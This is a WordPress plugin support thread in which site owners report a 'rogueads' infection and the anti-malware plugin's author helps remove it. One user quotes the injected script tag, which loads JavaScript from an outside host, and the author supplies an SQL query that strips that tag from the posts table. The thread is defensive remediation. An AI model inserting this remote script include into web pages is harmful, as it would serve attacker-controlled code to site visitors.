Title: Malware not removed
Last modified: September 27, 2018

---

# Malware not removed

 *  Resolved [nikhilrj1](https://wordpress.org/support/users/nikhilrj1/)
 * (@nikhilrj1)
 * [7 years, 7 months ago](https://wordpress.org/support/topic/malware-not-removed/)
 * I ran a complete scan and took around 4 hours to complete. But my malware rogueads1
   was not removed. Here is the link. Please help!
 * [https://sitecheck.sucuri.net/results/oakscart.com](https://sitecheck.sucuri.net/results/oakscart.com)
 * The page I need help with: _[[log in](https://login.wordpress.org/?redirect_to=https%3A%2F%2Fwordpress.org%2Fsupport%2Ftopic%2Fmalware-not-removed%2F%3Foutput_format%3Dmd&locale=en_US)
   to see the link]_

Viewing 9 replies - 1 through 9 (of 9 total)

 *  Plugin Author [Eli](https://wordpress.org/support/users/scheeeli/)
 * (@scheeeli)
 * [7 years, 7 months ago](https://wordpress.org/support/topic/malware-not-removed/#post-10730945)
 * I just added this new threat to my definition updates so if you download the 
   latest definitions then it should be able to fix this infection automatically.
 * The complete scan should not take that long so either you have a lot of extra
   files/folders on your site or your server is really slow, or there is something
   else wrong. Be sure to deactivate and caching plugins while you are scanning 
   your site. You could also try the Quick Scan on your Themes to fix this threat
   real quick but it might not work is your server has limited resources.
 * Please let me know if you need more help.
 *  [foxmulder520](https://wordpress.org/support/users/foxmulder520/)
 * (@foxmulder520)
 * [7 years, 7 months ago](https://wordpress.org/support/topic/malware-not-removed/#post-10732525)
 * [https://sitecheck.sucuri.net/results/vasaill.com](https://sitecheck.sucuri.net/results/vasaill.com)
   
   me too….please help us…thanks
 *  Plugin Author [Eli](https://wordpress.org/support/users/scheeeli/)
 * (@scheeeli)
 * [7 years, 7 months ago](https://wordpress.org/support/topic/malware-not-removed/#post-10733668)
 * I just added this new threat to my definition updates, please download the latest
   definitions and then run the Complete Scan again. It should be able to find and
   fix this infection automatically now.
 * If it does then please mark this topic “Resolved”, otherwise please let me know
   so that I can investigate further.
 *  [foxmulder520](https://wordpress.org/support/users/foxmulder520/)
 * (@foxmulder520)
 * [7 years, 7 months ago](https://wordpress.org/support/topic/malware-not-removed/#post-10734382)
 * It’s still here…please help us
    [https://sitecheck.sucuri.net/results/karawalker.com.tw](https://sitecheck.sucuri.net/results/karawalker.com.tw)
 *  [foxmulder520](https://wordpress.org/support/users/foxmulder520/)
 * (@foxmulder520)
 * [7 years, 7 months ago](https://wordpress.org/support/topic/malware-not-removed/#post-10734406)
 * this javascript still under my website…it’s malmare…
    </div> <!– .et_pb_section–
   ><script src=’[https://hotopponents.site/site.js&#8217](https://hotopponents.site/site.js&#8217);
   type=’text/javascript’></script></p>
 *  Plugin Author [Eli](https://wordpress.org/support/users/scheeeli/)
 * (@scheeeli)
 * [7 years, 7 months ago](https://wordpress.org/support/topic/malware-not-removed/#post-10734411)
 * That remaining JavaScript looks like it is in your content (it was probably a
   direct SQL Injection) so you need to edit it out of the content of each page 
   on your site. If you have access to PhPMyAdmin or another DB tool that can run
   SQL statements then you could try removing it with this SQL (Assuming your Posts
   Table uses the default name “wp_posts”, otherwise change that to match your table
   name):
 *     ```
       UPDATE wp_posts SET post_content = REPLACE(post_content, "<script src='https://hotopponents.site/site.js' type='text/javascript'></script>", '') WHERE post_content LIKE '%<script src=\'https://hotopponents.site/site.js%></script>%'
       ```
   
 *  Thread Starter [nikhilrj1](https://wordpress.org/support/users/nikhilrj1/)
 * (@nikhilrj1)
 * [7 years, 7 months ago](https://wordpress.org/support/topic/malware-not-removed/#post-10738508)
 * My malware rogueads is removed. Thank you for your quick and great support. As
   you said, i had lot of files. That should be the reason for taking so much time.
 *  [Vox Terman](https://wordpress.org/support/users/vox-terman/)
 * (@vox-terman)
 * [7 years, 6 months ago](https://wordpress.org/support/topic/malware-not-removed/#post-10852513)
 * Hello!
 * Delete code, but this code inject again and again, plugin not found this malware.
 *  Plugin Author [Eli](https://wordpress.org/support/users/scheeeli/)
 * (@scheeeli)
 * [7 years, 6 months ago](https://wordpress.org/support/topic/malware-not-removed/#post-10854423)
 * [@vox-terman](https://wordpress.org/support/users/vox-terman/),
    This topic is
   resolved, maybe you have a different type of infection on your server. It probably
   would have been better if you had started a new threat for your issue but here’s
   the questions I have for you. What code are you deleting that my plug in is not
   finding?

Viewing 9 replies - 1 through 9 (of 9 total)

The topic ‘Malware not removed’ is closed to new replies.

 * ![](https://ps.w.org/gotmls/assets/icon-256x256.png?rev=1001824)
 * [Anti-Malware Security and Brute-Force Firewall](https://wordpress.org/plugins/gotmls/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/gotmls/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/gotmls/)
 * [Active Topics](https://wordpress.org/support/plugin/gotmls/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/gotmls/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/gotmls/reviews/)

 * 9 replies
 * 4 participants
 * Last reply from: [Eli](https://wordpress.org/support/users/scheeeli/)
 * Last activity: [7 years, 6 months ago](https://wordpress.org/support/topic/malware-not-removed/#post-10854423)
 * Status: resolved